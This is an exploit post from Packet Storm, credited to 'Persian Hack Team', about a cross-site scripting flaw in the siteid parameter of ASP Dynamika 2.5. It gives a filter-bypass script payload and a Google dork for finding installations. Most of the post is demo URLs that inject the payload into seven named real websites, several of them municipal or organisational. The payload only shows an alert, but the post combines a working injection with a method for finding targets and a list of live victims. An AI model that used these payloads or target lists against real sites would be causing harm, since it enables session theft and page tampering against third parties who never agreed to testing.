ASP Dynamika version 2.5 suffers from a cross site scripting vulnerability.
03ca5035c8a555789ffc39c66287fa1aa9631adb55c10abcd347b9d848a316c2######################
# Exploit Title : ASP Dynamika 2.5 Cross Site Scripting Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dynamika.co.il/
# Google Dork : "Powered By : Dynamika"
# Date : 2015/12/08
# Version : 2.5
#
######################
#
# Vulnerable Paramter siteid=
#
# Bypass '"--></style></scRipt><scRipt>alert(0xa)</scRipt>
#
# Demo:
#
#http://www.dynamika.co.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#http://www.148.co.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#http://www.sc-haifa.org/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#http://www.kawkab.org.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#http://www.carmelite.org.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#http://www.fassuta.muni.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#http://www.ibllin.muni.il/dynamikadesign/home3.asp?siteid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280xa%29%3C/scRipt%3E
#
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed